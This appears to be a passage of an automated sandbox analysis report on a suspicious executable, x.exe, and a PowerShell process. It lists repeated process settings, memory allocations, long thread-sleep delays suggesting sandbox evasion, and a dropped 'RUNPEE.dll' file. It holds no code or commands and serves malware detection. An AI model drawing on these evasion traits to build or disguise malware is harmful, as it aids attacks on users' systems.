                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 1880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 5200000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 58A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 68A0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 69D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 79D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeMemory allocated: 4770000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599108Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598876Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598752Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598616Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598442Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597512Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597266Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597156Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597047Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596937Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596828Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596266Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596141Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596007Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595893Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595721Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595575Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595448Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595109Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594999Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594343Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594125Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3248Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 526Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 7144Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeWindow / User API: threadDelayed 2698Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RUNPEE.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5256Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 3840Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 2236Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 432Thread sleep count: 7144 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 432Thread sleep count: 2698 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599108s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -599000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598876s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598752s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598616s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598442s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598313s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598188s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -598062s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597953s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597625s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597512s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597391s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597266s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597156s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -597047s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596937s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596828s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596719s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596609s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596500s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596391s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596266s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596141s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -596007s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595893s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595721s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595575s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595448s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595219s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -595109s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594999s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594891s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594672s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exe TID: 6748Thread sleep time: -594125s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599547Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599108Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 599000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598876Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598752Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598616Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598442Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598313Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598188Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 598062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597953Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597625Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597512Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597266Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597156Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 597047Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596937Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596828Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596719Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596609Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596500Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596391Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596266Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596141Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 596007Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595893Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595721Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595575Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595448Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595328Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595219Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 595109Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594999Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594891Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594781Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594562Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594453Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594343Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594234Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeThread delayed: delay time: 594125Jump to behavior
                      Source: x.exe, 00000004.00000002.1318584955.000000000148D000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000005.00000002.3754100392.0000000000C27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
